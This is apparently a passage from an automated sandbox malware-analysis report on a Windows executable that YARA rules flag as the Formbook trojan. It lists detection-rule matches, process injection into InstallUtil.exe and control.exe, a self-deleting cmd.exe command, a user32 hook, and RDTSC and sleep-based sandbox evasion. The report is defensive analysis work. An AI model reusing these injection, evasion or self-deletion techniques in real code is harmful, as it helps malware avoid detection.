          Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: CSA73881.exe PID: 5724, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: InstallUtil.exe PID: 5408, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 3004, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309910 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_01309910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_013099A0 NtCreateSection,LdrInitializeThunk, 14_2_013099A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309860 NtQuerySystemInformation,LdrInitializeThunk, 14_2_01309860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309840 NtDelayExecution,LdrInitializeThunk, 14_2_01309840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_013098F0 NtReadVirtualMemory,LdrInitializeThunk, 14_2_013098F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309A20 NtResumeThread,LdrInitializeThunk, 14_2_01309A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309A00 NtProtectVirtualMemory,LdrInitializeThunk, 14_2_01309A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309A50 NtCreateFile,LdrInitializeThunk, 14_2_01309A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309540 NtReadFile,LdrInitializeThunk, 14_2_01309540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_013095D0 NtClose,LdrInitializeThunk, 14_2_013095D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309710 NtQueryInformationToken,LdrInitializeThunk, 14_2_01309710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_013097A0 NtUnmapViewOfSection,LdrInitializeThunk, 14_2_013097A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309780 NtMapViewOfSection,LdrInitializeThunk, 14_2_01309780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309660 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_01309660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_013096E0 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_013096E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309950 NtQueueApcThread, 14_2_01309950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_013099D0 NtCreateProcessEx, 14_2_013099D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309820 NtEnumerateKey, 14_2_01309820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_0130B040 NtSuspendThread, 14_2_0130B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_013098A0 NtWriteVirtualMemory, 14_2_013098A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309B00 NtSetValueKey, 14_2_01309B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_0130A3B0 NtGetContextThread, 14_2_0130A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309A10 NtQuerySection, 14_2_01309A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309A80 NtOpenDirectoryObject, 14_2_01309A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_0130AD30 NtSetContextThread, 14_2_0130AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309520 NtWaitForSingleObject, 14_2_01309520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309560 NtWriteFile, 14_2_01309560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_013095F0 NtQueryInformationFile, 14_2_013095F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309730 NtQueryVirtualMemory, 14_2_01309730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_0130A710 NtOpenProcessToken, 14_2_0130A710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_0130A770 NtOpenThread, 14_2_0130A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309770 NtSetInformationFile, 14_2_01309770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309760 NtOpenProcess, 14_2_01309760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309FE0 NtCreateMutant, 14_2_01309FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309610 NtEnumerateValueKey, 14_2_01309610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309670 NtQueryInformationProcess, 14_2_01309670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01309650 NtQueryValueKey, 14_2_01309650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_013096D0 NtCreateKey, 14_2_013096D0
          Source: CSA73881.exe, 00000000.00000000.240713040.0000000000DE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemobitech66754.exe. vs CSA73881.exe
          Source: CSA73881.exe, 00000000.00000002.311026406.0000000001388000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs CSA73881.exe
          Source: CSA73881.exe, 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFbniqdbbwru.dll" vs CSA73881.exe
          Source: CSA73881.exe, 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFbniqdbbwru.dll" vs CSA73881.exe
          Source: CSA73881.exe, 00000000.00000002.314157578.00000000032C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs CSA73881.exe
          Source: CSA73881.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\CSA73881.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\CSA73881.exe "C:\Users\user\Desktop\CSA73881.exe"
          Source: C:\Users\user\Desktop\CSA73881.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\CSA73881.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CSA73881.exe.log
          Source: classification engine Classification label: mal100.troj.evad.winEXE@8/1@5/3
          Source: CSA73881.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\CSA73881.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3236:120:WilError_01
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: CSA73881.exe Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: CSA73881.exe Static file information: File size 2187264 > 1048576
          Source: CSA73881.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: CSA73881.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x215200
          Source: CSA73881.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: InstallUtil.exe, 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.313743282.0000000001108000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.470353191.0000000004975000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.774017184.0000000004DCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.474545794.0000000004B15000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.771221161.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: InstallUtil.exe, InstallUtil.exe, 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.313743282.0000000001108000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.470353191.0000000004975000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.774017184.0000000004DCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.474545794.0000000004B15000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.771221161.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: control.exe, 0000001C.00000002.767573609.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001C.00000002.776199164.00000000051DF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: InstallUtil.pdb source: control.exe, 0000001C.00000002.767573609.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001C.00000002.776199164.00000000051DF000.00000004.10000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: CSA73881.exe, tds.cs.Net Code: cov System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\CSA73881.exe Code function: 0_2_0325F888 push E8944D8Bh; ret 0_2_0325F88D
          Source: C:\Users\user\Desktop\CSA73881.exe Code function: 0_2_064534C8 push es; iretd 0_2_06456600
          Source: C:\Users\user\Desktop\CSA73881.exe Code function: 0_2_064534C8 push es; ret 0_2_0645663C
          Source: C:\Users\user\Desktop\CSA73881.exe Code function: 0_2_064534C8 push es; retf 453Bh 0_2_0645666C
          Source: C:\Users\user\Desktop\CSA73881.exe Code function: 0_2_06456601 push es; ret 0_2_0645663C
          Source: C:\Users\user\Desktop\CSA73881.exe Code function: 0_2_0645658D push es; retf 0_2_064565A4
          Source: C:\Users\user\Desktop\CSA73881.exe Code function: 0_2_0645658D push es; iretd 0_2_06456600
          Source: C:\Users\user\Desktop\CSA73881.exe Code function: 0_2_064565A5 push es; iretd 0_2_06456600
          Source: C:\Users\user\Desktop\CSA73881.exe Code function: 0_2_0645CCE6 push es; retf 0_2_0645CD04
          Source: C:\Users\user\Desktop\CSA73881.exe Code function: 0_2_0645CD4D push es; retf 0_2_0645CD2C
          Source: C:\Users\user\Desktop\CSA73881.exe Code function: 0_2_0645CD16 push ss; retf 0_2_0645CD19
          Source: C:\Users\user\Desktop\CSA73881.exe Code function: 0_2_06452A75 push es; iretd 0_2_06452A78
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_0131D0D1 push ecx; ret 14_2_0131D0E4

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xED
          Source: C:\Users\user\Desktop\CSA73881.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000030A9904 second address: 00000000030A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000030A9B7E second address: 00000000030A9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\CSA73881.exe TID: 5728 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5708 Thread sleep count: 34 > 30
          Source: C:\Windows\explorer.exe TID: 5708 Thread sleep time: -68000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 5548 Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_01395BA5 rdtsc 14_2_01395BA5
          Source: C:\Users\user\Desktop\CSA73881.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe API coverage: 4.7 %
          Source: C:\Users\user\Desktop\CSA73881.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\CSA73881.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012D3D34 mov eax, dword ptr fs:[00000030h]14_2_012D3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012CAD30 mov eax, dword ptr fs:[00000030h]14_2_012CAD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012EC577 mov eax, dword ptr fs:[00000030h]14_2_012EC577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012EC577 mov eax, dword ptr fs:[00000030h]14_2_012EC577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01303D43 mov eax, dword ptr fs:[00000030h]14_2_01303D43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01343540 mov eax, dword ptr fs:[00000030h]14_2_01343540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01373D40 mov eax, dword ptr fs:[00000030h]14_2_01373D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012E7D50 mov eax, dword ptr fs:[00000030h]14_2_012E7D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012F35A1 mov eax, dword ptr fs:[00000030h]14_2_012F35A1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_013905AC mov eax, dword ptr fs:[00000030h]14_2_013905AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_013905AC mov eax, dword ptr fs:[00000030h]14_2_013905AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012F1DB5 mov eax, dword ptr fs:[00000030h]14_2_012F1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012F1DB5 mov eax, dword ptr fs:[00000030h]14_2_012F1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012F1DB5 mov eax, dword ptr fs:[00000030h]14_2_012F1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012C2D8A mov eax, dword ptr fs:[00000030h]14_2_012C2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012C2D8A mov eax, dword ptr fs:[00000030h]14_2_012C2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012C2D8A mov eax, dword ptr fs:[00000030h]14_2_012C2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012C2D8A mov eax, dword ptr fs:[00000030h]14_2_012C2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012C2D8A mov eax, dword ptr fs:[00000030h]14_2_012C2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012F2581 mov eax, dword ptr fs:[00000030h]14_2_012F2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012F2581 mov eax, dword ptr fs:[00000030h]14_2_012F2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012F2581 mov eax, dword ptr fs:[00000030h]14_2_012F2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012F2581 mov eax, dword ptr fs:[00000030h]14_2_012F2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012FFD9B mov eax, dword ptr fs:[00000030h]14_2_012FFD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012FFD9B mov eax, dword ptr fs:[00000030h]14_2_012FFD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01378DF1 mov eax, dword ptr fs:[00000030h]14_2_01378DF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012DD5E0 mov eax, dword ptr fs:[00000030h]14_2_012DD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012DD5E0 mov eax, dword ptr fs:[00000030h]14_2_012DD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0138FDE2 mov eax, dword ptr fs:[00000030h]14_2_0138FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0138FDE2 mov eax, dword ptr fs:[00000030h]14_2_0138FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0138FDE2 mov eax, dword ptr fs:[00000030h]14_2_0138FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0138FDE2 mov eax, dword ptr fs:[00000030h]14_2_0138FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346DC9 mov eax, dword ptr fs:[00000030h]14_2_01346DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346DC9 mov eax, dword ptr fs:[00000030h]14_2_01346DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346DC9 mov eax, dword ptr fs:[00000030h]14_2_01346DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346DC9 mov ecx, dword ptr fs:[00000030h]14_2_01346DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346DC9 mov eax, dword ptr fs:[00000030h]14_2_01346DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_01346DC9 mov eax, dword ptr fs:[00000030h]14_2_01346DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_012FBC2C mov eax, dword ptr fs:[00000030h]14_2_012FBC2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_0139740D mov eax, dword ptr fs:[00000030h]14_2_0139740D
